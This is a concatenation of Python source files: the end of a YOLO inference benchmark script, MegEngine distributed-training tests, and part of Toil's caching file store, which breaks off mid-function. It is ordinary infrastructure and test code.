inshape[0] = args['batch_sz']
args['net_h'] = inshape[2]
args['net_w'] = inshape[3]
# spawn dispatchers
dispatcher = yoloDispatcher(g_nDispatchers, g_nWorkers, inshape)
# spawn workers
workers = yoloWorkerPool(args['vitis_rundir']+"_worker", g_nWorkers, args)
# send work to system
g_nQueries = int(np.ceil(len(images) / inshape[0]))
work = []
for qIdx in range(g_nQueries):
idx = qIdx * inshape[0]
workBatch = [images[(idx+i) % len(images)] for i in range(inshape[0])]
work.append((qIdx, workBatch,
(args['img_raw_scale'], args['img_mean'], args['img_input_scale'])))
startTime = timeit.default_timer()
dispatcher.run(work)
del dispatcher
t = timeit.default_timer() - startTime
print("Queries: %d, Elapsed: %.2fs, QPS: %.2f, FPS: %.2f" \
% (g_nQueries, t, g_nQueries / t, g_nQueries * inshape[0] / t))
sys.stdout.flush()
# cleanup
del workers
del fmaster
del xserver
# mAP calculation
if(args['golden']):
print()
print("Computing mAP score : ")
labels = xdnn_io.get_labels(args['labels'])
print("Class names are : {} ".format(labels))
mAP = calc_detector_mAP(args['results_dir'], args['golden'], len(labels), labels, args['prob_threshold'], args['mapiouthresh'], args['points'])
sys.stdout.flush()
if __name__ == '__main__':
main()
|
test_distributed.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import platform
import queue
import numpy as np
import pytest
import megengine as mge
import megengine.distributed as dist
from megengine.core.ops.builtin import CollectiveComm, ParamPackConcat, ParamPackSplit
from megengine.distributed.helper import (
get_device_count_by_fork,
param_pack_concat,
param_pack_split,
)
def _assert_q_empty(q):
try:
res = q.get(timeout=1)
except Exception as e:
assert isinstance(e, queue.Empty)
else:
assert False, "queue is not empty"
def _assert_q_val(q, val):
ret = q.get()
assert ret == val
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="windows disable MGB_ENABLE_OPR_MM"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_init_process_group():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank, backend):
dist.init_process_group("localhost", port, world_size, rank, rank, backend)
assert dist.is_distributed() == True
assert dist.get_rank() == rank
assert dist.get_world_size() == world_size
assert dist.get_backend() == backend
py_server_addr = dist.get_py_server_addr()
assert py_server_addr[0] == "localhost"
assert py_server_addr[1] == port
mm_server_addr = dist.get_mm_server_addr()
assert mm_server_addr[0] == "localhost"
assert mm_server_addr[1] > 0
assert isinstance(dist.get_client(), dist.Client)
def check(backend):
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, backend))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
check("nccl")
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="windows disable MGB_ENABLE_OPR_MM"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_new_group():
world_size = 3
ranks = [2, 0]
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank):
dist.init_process_group("localhost", port, world_size, rank, rank)
if rank in ranks:
group = dist.new_group(ranks)
assert group.size == 2
assert group.key == "2,0"
assert group.rank == ranks.index(rank)
assert group.comp_node == "gpu{}:2".format(rank)
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank,))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="windows disable MGB_ENABLE_OPR_MM"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_group_barrier():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank, q):
dist.init_process_group("localhost", port, world_size, rank, rank)
dist.group_barrier()
if rank == 0:
dist.group_barrier()
q.put(0) # to be observed in rank 1
else:
_assert_q_empty(q) # q.put(0) is not executed in rank 0
dist.group_barrier()
_assert_q_val(q, 0) # q.put(0) executed in rank 0
Q = mp.Queue()
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, Q))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="windows disable MGB_ENABLE_OPR_MM"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_synchronized():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
@dist.synchronized
def func(rank, q):
q.put(rank)
def worker(rank, q):
dist.init_process_group("localhost", port, world_size, rank, rank)
dist.group_barrier()
if rank == 0:
func(0, q) # q.put(0)
q.put(2)
else:
_assert_q_val(q, 0) # func executed in rank 0
_assert_q_empty(q) # q.put(2) is not executed
func(1, q)
_assert_q_val(
q, 1
) # func in rank 1 executed earlier than q.put(2) in rank 0
_assert_q_val(q, 2) # q.put(2) executed in rank 0
Q = mp.Queue()
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, Q))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="windows disable MGB_ENABLE_OPR_MM"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_user_set_get():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank):
dist.init_process_group("localhost", port, world_size, rank, rank)
# set in race condition
dist.get_client().user_set("foo", 1)
# get in race condition
ret = dist.get_client().user_get("foo")
assert ret == 1
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank,))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
def test_oprmm_hashable():
lhs = (CollectiveComm(), ParamPackConcat(), ParamPackSplit())
rhs = (CollectiveComm(), ParamPackConcat(), ParamPackSplit())
assert lhs == rhs
assert hash(lhs) == hash(rhs)
def test_param_pack_split():
a = mge.Tensor(np.ones((10,), np.int32))
b, c = param_pack_split(a, [0, 1, 1, 10], [(1,), (3, 3)])
assert np.allclose(b.numpy(), a.numpy()[1])
assert np.allclose(c.numpy(), a.numpy()[1:].reshape(3, 3))
def test_param_pack_concat():
a = mge.Tensor(np.ones((1,), np.int32))
b = mge.Tensor(np.ones((3, 3), np.int32))
offsets_val = [0, 1, 1, 10]
offsets = mge.Tensor(offsets_val, np.int32)
c = param_pack_concat([a, b], offsets, offsets_val)
assert np.allclose(np.concatenate([a.numpy(), b.numpy().flatten()]), c.numpy())
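# Hedged numpy-only reference (no MegEngine involved) for the offsets used in
# the two tests above: [0, 1, 1, 10] means the first tensor occupies flat slots
# [0:1] and the second occupies flat slots [1:10] of the packed buffer.
def _param_pack_offsets_reference():
    packed = np.arange(10, dtype=np.int32)
    first = packed[0:1].reshape(1)
    second = packed[1:10].reshape(3, 3)
    assert np.array_equal(np.concatenate([first, second.flatten()]), packed)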
|
fileStore.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import str
from builtins import range
from builtins import object
from abc import abstractmethod, ABCMeta
from collections import namedtuple, defaultdict
from contextlib import contextmanager
from fcntl import flock, LOCK_EX, LOCK_UN
from functools import partial
from hashlib import sha1
from threading import Thread, Semaphore, Event
from future.utils import with_metaclass
from six.moves.queue import Empty, Queue
import base64
import dill
import errno
import logging
import os
import shutil
import stat
import tempfile
import time
import uuid
from toil.lib.objects import abstractclassmethod
from toil.lib.humanize import bytes2human
from toil.common import cacheDirName, getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.resource import ModuleDescriptor
logger = logging.getLogger(__name__)
class DeferredFunction(namedtuple('DeferredFunction', 'function args kwargs name module')):
"""
>>> df = DeferredFunction.create(defaultdict, None, {'x':1}, y=2)
>>> df
DeferredFunction(defaultdict, ...)
>>> df.invoke() == defaultdict(None, x=1, y=2)
True
"""
@classmethod
def create(cls, function, *args, **kwargs):
"""
Capture the given callable and arguments as an instance of this class.
:param callable function: The deferred action to take in the form of a function
:param tuple args: Non-keyword arguments to the function
:param dict kwargs: Keyword arguments to the function
"""
# The general principle is to deserialize as late as possible, i.e. when the function is
# to be invoked, as that will avoid redundantly deserializing deferred functions for
# concurrently running jobs when the cache state is loaded from disk. By implication we
# should serialize as early as possible. We need to serialize the function as well as its
# arguments.
return cls(*list(map(dill.dumps, (function, args, kwargs))),
name=function.__name__,
module=ModuleDescriptor.forModule(function.__module__).globalize())
def invoke(self):
"""
Invoke the captured function with the captured arguments.
"""
logger.debug('Running deferred function %s.', self)
self.module.makeLoadable()
function, args, kwargs = list(map(dill.loads, (self.function, self.args, self.kwargs)))
return function(*args, **kwargs)
def __str__(self):
return '%s(%s, ...)' % (self.__class__.__name__, self.name)
__repr__ = __str__
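# Hedged, self-contained illustration (not part of Toil) of the early-serialize /
# late-deserialize idea behind DeferredFunction: the callable and its arguments
# survive a dill round trip and can be invoked much later.
def _deferred_function_roundtrip_example():
    payload = list(map(dill.dumps, (max, (3, 7), {})))
    function, args, kwargs = list(map(dill.loads, payload))
    return function(*args, **kwargs)  # == 7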
class FileStore(with_metaclass(ABCMeta, object)):
"""
An abstract base class to represent the interface between a worker and the job store. Concrete
subclasses will be used to manage temporary files, read and write files from the job store and
log messages, passed as argument to the :meth:`toil.job.Job.run` method.
"""
# Variables used for syncing reads/writes
_pendingFileWritesLock = Semaphore()
_pendingFileWrites = set()
_terminateEvent = Event() # Used to signify crashes in threads
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
self.jobStore = jobStore
self.jobGraph = jobGraph
self.localTempDir = os.path.abspath(localTempDir)
self.workFlowDir = os.path.dirname(self.localTempDir)
self.jobName = self.jobGraph.command.split()[1]
self.inputBlockFn = inputBlockFn
self.loggingMessages = []
self.filesToDelete = set()
self.jobsToDelete = set()
@staticmethod
def createFileStore(jobStore, jobGraph, localTempDir, inputBlockFn, caching):
fileStoreCls = CachingFileStore if caching else NonCachingFileStore
return fileStoreCls(jobStore, jobGraph, localTempDir, inputBlockFn)
@abstractmethod
@contextmanager
def open(self, job):
"""
The context manager used to conduct tasks prior to, and after, a job has been run.
:param toil.job.Job job: The job instance of the toil job to run.
"""
raise NotImplementedError()
# Functions related to temp files and directories
def getLocalTempDir(self):
"""
Get a new local temporary directory in which to write files that persist for the duration of
the job.
:return: The absolute path to a new local temporary directory. This directory will exist
for the duration of the job only, and is guaranteed to be deleted once the job
terminates, removing all files it contains recursively.
:rtype: str
"""
return os.path.abspath(tempfile.mkdtemp(prefix="t", dir=self.localTempDir))
def getLocalTempFile(self):
"""
Get a new local temporary file that will persist for the duration of the job.
:return: The absolute path to a local temporary file. This file will exist for the
duration of the job only, and is guaranteed to be deleted once the job terminates.
:rtype: str
"""
handle, tmpFile = tempfile.mkstemp(prefix="tmp", suffix=".tmp", dir=self.localTempDir)
os.close(handle)
return os.path.abspath(tmpFile)
def getLocalTempFileName(self):
"""
Get a valid name for a new local file. Don't actually create a file at the path.
:return: Path to valid file
:rtype: str
"""
# Create, and then delete a temp file. Creating will guarantee you a unique, unused
# file name. There is a very, very, very low chance that another job will create the
# same file name in the span of this one being deleted and then being used by the user.
tempFile = self.getLocalTempFile()
os.remove(tempFile)
return tempFile
# Functions related to reading, writing and removing files to/from the job store
@abstractmethod
def writeGlobalFile(self, localFileName, cleanup=False):
"""
Takes a file (as a path) and uploads it to the job store.
:param string localFileName: The path to the local file to upload.
:param bool cleanup: if True, the copy of the global file will be deleted once the
job and all its successors have completed running. If not, the global file must be
deleted manually.
:return: an ID that can be used to retrieve the file.
:rtype: toil.fileStore.FileID
"""
raise NotImplementedError()
@contextmanager
def writeGlobalFileStream(self, cleanup=False):
"""
Similar to writeGlobalFile, but allows the writing of a stream to the job store.
The yielded file handle does not need to and should not be closed explicitly.
:param bool cleanup: is as in :func:`toil.fileStore.FileStore.writeGlobalFile`.
:return: A context manager yielding a tuple of
1) a file handle which can be written to and
2) the toil.fileStore.FileID of the resulting file in the job store.
"""
# TODO: Make this work with FileID
with self.jobStore.writeFileStream(None if not cleanup else self.jobGraph.jobStoreID) as (backingStream, fileStoreID):
# We have a string version of the file ID, and the backing stream.
# We need to yield a stream the caller can write to, and a FileID
# that accurately reflects the size of the data written to the
# stream. We assume the stream is not seekable.
# Make and keep a reference to the file ID, which is currently empty
fileID = FileID(fileStoreID, 0)
# Wrap the stream to increment the file ID's size for each byte written
wrappedStream = WriteWatchingStream(backingStream)
# When the stream is written to, count the bytes
def handle(numBytes):
fileID.size += numBytes
wrappedStream.onWrite(handle)
yield wrappedStream, fileID
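# Illustrative usage sketch (an assumption about typical call sites, not original code):
# inside a job's run method the stream API might be used like this, with the wrapped
# stream keeping fileID.size in step with the bytes actually written:
#
#   with fileStore.writeGlobalFileStream(cleanup=True) as (handle, fileID):
#       handle.write(b'chunk one')
#       handle.write(b'chunk two')
#   # fileID now carries both the job store ID and the total size written (18 bytes here)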
@abstractmethod
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
"""
Makes the file associated with fileStoreID available locally. If mutable is True,
then a copy of the file will be created locally so that the original is not modified
and does not change the file for other jobs. If mutable is False, then a link can
be created to the file, saving disk resources.
If a user path is specified, it is used as the destination. If a user path isn't
specified, the file is stored in the local temp directory with an encoded name.
:param toil.fileStore.FileID fileStoreID: job store id for the file
:param string userPath: a path to the file to which the global file will be copied
or hard-linked (see below).
:param bool cache: Described in :func:`toil.fileStore.CachingFileStore.readGlobalFile`
:param bool mutable: Described in :func:`toil.fileStore.CachingFileStore.readGlobalFile`
:return: An absolute path to a local, temporary copy of the file keyed by fileStoreID.
:rtype: str
"""
raise NotImplementedError()
@abstractmethod
def readGlobalFileStream(self, fileStoreID):
"""
Similar to readGlobalFile, but allows a stream to be read from the job store. The yielded
file handle does not need to and should not be closed explicitly.
:return: a context manager yielding a file handle which can be read from.
"""
raise NotImplementedError()
@abstractmethod
def deleteLocalFile(self, fileStoreID):
"""
Deletes local copies of files associated with the provided job store ID.
:param str fileStoreID: File Store ID of the file to be deleted.
"""
raise NotImplementedError()
@abstractmethod
def deleteGlobalFile(self, fileStoreID):
"""
Deletes local files with the provided job store ID and then permanently deletes them from
the job store. To ensure that the job can be restarted if necessary, the delete will not
happen until after the job's run method has completed.
:param fileStoreID: the job store ID of the file to be deleted.
"""
raise NotImplementedError()
# Functions used to read and write files directly between a source url and the job store.
def importFile(self, srcUrl, sharedFileName=None):
return self.jobStore.importFile(srcUrl, sharedFileName=sharedFileName)
def exportFile(self, jobStoreFileID, dstUrl):
raise NotImplementedError()
# A utility method for accessing filenames
def _resolveAbsoluteLocalPath(self, filePath):
"""
Return the absolute path to filePath. This is a wrapper for os.path.abspath because macOS
symlinks /tmp and /var (the most common places for a default tempdir) to /private/tmp and
/private/var respectively.
:param str filePath: The absolute or relative path to the file. If relative, it must be
relative to the local temp working dir
:return: Absolute path to filePath
:rtype: str
"""
if os.path.isabs(filePath):
return os.path.abspath(filePath)
else:
return os.path.join(self.localTempDir, filePath)
class _StateFile(object):
"""
Utility class to read and write dill-ed state dictionaries from/to a file into a namespace.
"""
def __init__(self, stateDict):
assert isinstance(stateDict, dict)
self.__dict__.update(stateDict)
@abstractclassmethod
@contextmanager
def open(cls, outer=None):
"""
This is a context manager that opens the state file and reads it into an object that is
returned to the user in the yield.
:param outer: Instance of the calling class (to use outer methods).
"""
raise NotImplementedError()
@classmethod
def _load(cls, fileName):
"""
Load the state of the cache from the state file
:param str fileName: Path to the cache state file.
:return: An instance of the state as a namespace.
:rtype: _StateFile
"""
# Read the value from the cache state file, then initialize an instance of
# _CacheState with it.
with open(fileName, 'rb') as fH:
infoDict = dill.load(fH)
return cls(infoDict)
def write(self, fileName):
"""
Write the current state into a temporary file then atomically rename it to the main
state file.
:param str fileName: Path to the state file.
"""
with open(fileName + '.tmp', 'wb') as fH:
# Based on answer by user "Mark" at:
# http://stackoverflow.com/questions/2709800/how-to-pickle-yourself
# We can't pickle nested classes. So we have to pickle the variables of the class
# If we ever change this, we need to ensure it doesn't break FileID
dill.dump(self.__dict__, fH)
os.rename(fileName + '.tmp', fileName)
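# Illustrative note (assumption, not original code): because os.rename() is atomic on a
# POSIX filesystem, a concurrent _load() only ever observes the old state or the new
# state, never a half-written dill payload. A round trip looks like:
#
#   state = cls._load('/path/to/_cacheState')   # read the existing namespace
#   state.sigmaJob = 0                          # mutate it in memory
#   state.write('/path/to/_cacheState')         # .tmp write + rename publishes it atomically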
# Methods related to the deferred function logic
@abstractclassmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
This function looks at the state of all jobs registered on the node and will handle them
(clean up their presence on the node, and run any registered deferred functions).
:param nodeInfo: Information regarding the node required for identifying dead jobs.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
"""
raise NotImplementedError()
@abstractmethod
def _registerDeferredFunction(self, deferredFunction):
"""
Register the given deferred function with this job.
:param DeferredFunction deferredFunction: the function to register
"""
raise NotImplementedError()
@staticmethod
def _runDeferredFunctions(deferredFunctions):
"""
Invoke the specified deferred functions and return a list of names of functions that
raised an exception while being invoked.
:param list[DeferredFunction] deferredFunctions: the DeferredFunctions to run
:rtype: list[str]
"""
failures = []
for deferredFunction in deferredFunctions:
try:
deferredFunction.invoke()
except:
failures.append(deferredFunction.name)
logger.exception('%s failed.', deferredFunction)
return failures
# Functions related to logging
def logToMaster(self, text, level=logging.INFO):
"""
Send a logging message to the leader. The message will also be \
logged by the worker at the same level.
:param text: The string to log.
:param int level: The logging level.
"""
logger.log(level=level, msg=("LOG-TO-MASTER: " + text))
self.loggingMessages.append(dict(text=text, level=level))
# Functions run after the completion of the job.
@abstractmethod
def _updateJobWhenDone(self):
"""
Update the status of the job on the disk.
"""
raise NotImplementedError()
@abstractmethod
def _blockFn(self):
"""
Blocks while _updateJobWhenDone is running. This function is called by this job's
successor to ensure that it does not begin modifying the job store until after this job has
finished doing so.
"""
raise NotImplementedError()
# Utility function used to identify if a pid is still running on the node.
@staticmethod
def _pidExists(pid):
"""
This will return True if the process associated with pid is still running on the machine.
This is based on stackoverflow question 568271.
:param int pid: ID of the process to check for
:return: True/False
:rtype: bool
"""
assert pid > 0
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
else:
raise
else:
return True
@abstractclassmethod
def shutdown(cls, dir_):
"""
Shutdown the filestore on this node.
This is intended to be called on batch system shutdown.
:param dir_: The keystone directory containing the required information for fixing the state
of failed workers on the node before cleaning up.
"""
raise NotImplementedError()
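# Illustrative sketch (assumption about typical usage, not original code): a concrete
# FileStore instance is what a job's run(self, fileStore) method sees, e.g.
#
#   def run(self, fileStore):
#       localPath = fileStore.readGlobalFile(self.inputFileID)   # self.inputFileID is hypothetical
#       outPath = fileStore.getLocalTempFile()                   # scratch space for the job
#       # ... produce outPath ...
#       return fileStore.writeGlobalFile(outPath)                # publish the result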
class CachingFileStore(FileStore):
"""
A cache-enabled file store that attempts to use hard links and asynchronous job store writes to
reduce I/O between, and during, jobs.
"""
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
super(CachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, inputBlockFn)
# Variables related to asynchronous writes.
self.workerNumber = 2
self.queue = Queue()
self.updateSemaphore = Semaphore()
self.workers = [Thread(target=self.asyncWrite) for i in range(self.workerNumber)]
for worker in self.workers:
worker.start()
# Variables related to caching
# cacheDir has to be one level above the local worker tempdir, at the same level as the
# worker dirs. At this point, localTempDir is the worker directory, not the job
# directory.
self.localCacheDir = os.path.join(os.path.dirname(localTempDir),
cacheDirName(self.jobStore.config.workflowID))
self.cacheLockFile = os.path.join(self.localCacheDir, '.cacheLock')
self.cacheStateFile = os.path.join(self.localCacheDir, '_cacheState')
# Since each worker has its own unique CachingFileStore instance, and only one Job can run
# at a time on a worker, we can track the files the job's file store operates on in a
# dictionary.
self.jobSpecificFiles = {}
self.jobName = str(self.jobGraph)
self.jobID = sha1(self.jobName.encode('utf-8')).hexdigest()
logger.debug('Starting job (%s) with ID (%s).', self.jobName, self.jobID)
# A variable to describe how many hard links an unused file in the cache will have.
# Also used as the canonical place to record whether we are using a
# FileJobStore that we can just reach into and that will own the disk
# usage of files.
self.nlinkThreshold = None
self.workflowAttemptNumber = self.jobStore.config.workflowAttemptNumber
# This is a flag to better resolve cache equation imbalances at cleanup time.
self.cleanupInProgress = False
# Now that we've set up all the required variables, set up the cache directory for the
# job if required.
self._setupCache()
@contextmanager
def open(self, job):
"""
This context manager decorated method allows cache-specific operations to be conducted
before and after the execution of a job in worker.py
"""
# Create a working directory for the job
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
# Check the status of all jobs on this node. If there are jobs that started and died before
# cleaning up their presence from the cache state file, restore the cache file to a state
# where the jobs don't exist.
with self._CacheState.open(self) as cacheInfo:
self.findAndHandleDeadJobs(cacheInfo)
# While we have a lock on the cache file, run a naive check to see if jobs on this node
# have greatly gone over their requested limits.
if cacheInfo.sigmaJob < 0:
logger.warning('Detected that one or more jobs on this node have used more '
'resources than requested. Turn on debug logs to see more '
'information on cache usage.')
# Get the requirements for the job and clean the cache if necessary. cleanCache will
# ensure that the requirements for this job are stored in the state file.
jobReqs = job.disk
# Cleanup the cache to free up enough space for this job (if needed)
self.cleanCache(jobReqs)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Please reconsider modifying "
"the user script to avoid the chance of failure due to "
"incorrectly requested resources. " + logString,
level=logging.WARNING)
os.chdir(startingDir)
self.cleanupInProgress = True
# Delete all the job specific files and return sizes to jobReqs
self.returnJobReqs(jobReqs)
with self._CacheState.open(self) as cacheInfo:
# Carry out any user-defined cleanup actions
deferredFunctions = cacheInfo.jobState[self.jobID]['deferredFunctions']
failures = self._runDeferredFunctions(deferredFunctions)
for failure in failures:
self.logToMaster('Deferred function "%s" failed.' % failure, logging.WARN)
# Finally delete the job from the cache state file
cacheInfo.jobState.pop(self.jobID)
# Functions related to reading, writing and removing files to/from the job store
def writeGlobalFile(self, localFileName, cleanup=False):
"""
Takes a file (as a path) and uploads it to the job store. Depending on the jobstore
used, carry out the appropriate cache functions.
"""
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
# If cleanup was requested, tie the file to this job's ID so the job store deletes it
# once the job and all its successors have finished.
cleanupID = None if not cleanup else self.jobGraph.jobStoreID
# If the file is from the scope of local temp dir
if absLocalFileName.startswith(self.localTempDir):
# If the job store is of type FileJobStore and the job store and the local temp dir
# are on the same file system, then we want to hard link the files instead of copying
# barring the case where the file being written was one that was previously read
# from the file store. In that case, you want to copy to the file store so that
# the two have distinct nlink counts.
# Can read without a lock because we're only reading job-specific info.
jobSpecificFiles = list(self._CacheState._load(self.cacheStateFile).jobState[
self.jobID]['filesToFSIDs'].keys())
# Saying nlink is 2 implicitly means we are using the job file store, and it is on
# the same device as the work dir.
if self.nlinkThreshold == 2 and absLocalFileName not in jobSpecificFiles:
jobStoreFileID = self.jobStore.getEmptyFileStoreID(cleanupID)
# getEmptyFileStoreID creates the file in the scope of the job store hence we
# need to delete it before linking.
os.remove(self.jobStore._getAbsPath(jobStoreFileID))
os.link(absLocalFileName, self.jobStore._getAbsPath(jobStoreFileID))
# If they're not on the file system, or if the file is already linked with an
# existing file, we need to copy to the job store.
# Check if the user allows asynchronous file writes
elif self.jobStore.config.useAsync:
jobStoreFileID = self.jobStore.getEmptyFileStoreID(cleanupID)
# Before we can start the async process, we should also create a dummy harbinger
# file in the cache such that any subsequent jobs asking for this file will not
# attempt to download it from the job store till the write is complete. We do
# this now instead of in the writing thread because there is an edge case where
# readGlobalFile in a subsequent job is called before the writing thread has
# received the message to write the file and has created the dummy harbinger
# (and the file was unable to be cached/was evicted from the cache).
harbingerFile = self.HarbingerFile(self, fileStoreID=jobStoreFileID)
harbingerFile.write()
fileHandle = open(absLocalFileName, 'rb')
with self._pendingFileWritesLock:
self._pendingFileWrites.add(jobStoreFileID)
# A file handle added to the queue allows the asyncWrite threads to remove their
# jobID from _pendingFileWrites. Therefore, a file should only be added after
# its fileID is added to _pendingFileWrites
self.queue.put((fileHandle, jobStoreFileID))
# Else write directly to the job store.
else:
jobStoreFileID = self.jobStore.writeFile(absLocalFileName, cleanupID)
# Local files are cached by default, unless they were written from previously read
# files.
if absLocalFileName not in jobSpecificFiles:
self.addToCache(absLocalFileName, jobStoreFileID, 'write')
else:
self._JobState.updateJobSpecificFiles(self, jobStoreFileID, absLocalFileName,
0.0, False)
# Else write directly to the job store.
else:
jobStoreFileID = self.jobStore.writeFile(absLocalFileName, cleanupID)
# Non local files are NOT cached by default, but they are tracked as local files.
self._JobState.updateJobSpecificFiles(self, jobStoreFileID, None,
0.0, False)
return FileID.forPath(jobStoreFileID, absLocalFileName)
def writeGlobalFileStream(self, cleanup=False):
# TODO: Make this work with caching
return super(CachingFileStore, self).writeGlobalFileStream(cleanup)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
"""
Downloads a file described by fileStoreID from the file store to the local directory.
The function first looks for the file in the cache and if found, it hardlinks to the
cached copy instead of downloading.
The cache parameter will be used only if the file isn't already in the cache, and
provided user path (if specified) is in the scope of local temp dir.
:param bool cache: If True, a copy of the file will be saved into a cache that can be
used by other workers. caching supports multiple concurrent workers requesting the
same file by allowing only one to download the file while the others wait for it to
complete.
:param bool mutable: If True, the file path returned points to a file that is
modifiable by the user. Using False is recommended as it saves disk by making
multiple workers share a file via hard links. The default is False.
"""
# Check that the file hasn't been deleted by the user
if fileStoreID in self.filesToDelete:
raise RuntimeError('Trying to access a file in the jobStore you\'ve deleted: ' + \
'%s' % fileStoreID)
# Get the name of the file as it would be in the cache
cachedFileName = self.encodedFileID(fileStoreID)
# setup the harbinger variable for the file. This is an identifier that the file is
# currently being downloaded by another job and will be in the cache shortly. It is used
# to prevent multiple jobs from simultaneously downloading the same file from the file
# store.
harbingerFile = self.HarbingerFile(self, cachedFileName=cachedFileName)
# setup the output filename. If a name is provided, use it - This makes it a Named
# Local File. If a name isn't provided, use the base64 encoded name such that we can
# easily identify the files later on.
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
# Overwriting an existing file is not allowed.
raise RuntimeError('File %s exists. Cannot overwrite.' % localFilePath)
fileIsLocal = True if localFilePath.startswith(self.localTempDir) else False
else:
localFilePath = self.getLocalTempFileName()
fileIsLocal = True
# First check whether the file is in cache. If it is, then hardlink the file to
# userPath. Cache operations can only occur on local files.
with self.cacheLock() as lockFileHandle:
if fileIsLocal and self._fileIsCached(fileStoreID):
logger.debug('CACHE: Cache hit on file with ID \'%s\'.' % fileStoreID)
assert not os.path.exists(localFilePath)
if mutable:
shutil.copyfile(cachedFileName, localFilePath)
cacheInfo = self._CacheState._load(self.cacheStateFile)
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(fileStoreID, localFilePath, -1, None)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
else:
os.link(cachedFileName, localFilePath)
self.returnFileSize(fileStoreID, localFilePath, lockFileHandle,
fileAlreadyCached=True)
# If the file is not in cache, check whether the .harbinger file for the given
# FileStoreID exists. If it does, wait and periodically check for the removal of the
# harbinger and the addition of the completed download to the cache by the other job.
# Then we link to it.
elif fileIsLocal and harbingerFile.exists():
harbingerFile.waitOnDownload(lockFileHandle)
# If the code reaches here, the harbinger file has been removed. This means
# either the file was successfully downloaded and added to cache, or something
# failed. To prevent code duplication, we recursively call readGlobalFile.
flock(lockFileHandle, LOCK_UN)
return self.readGlobalFile(fileStoreID, userPath=userPath, cache=cache,
mutable=mutable)
# If the file is not in cache, then download it to the userPath and then add to
# cache if specified.
else:
logger.debug('CACHE: Cache miss on file with ID \'%s\'.' % fileStoreID)
if fileIsLocal and cache:
# If caching of the downloaded file is desired, first create the harbinger
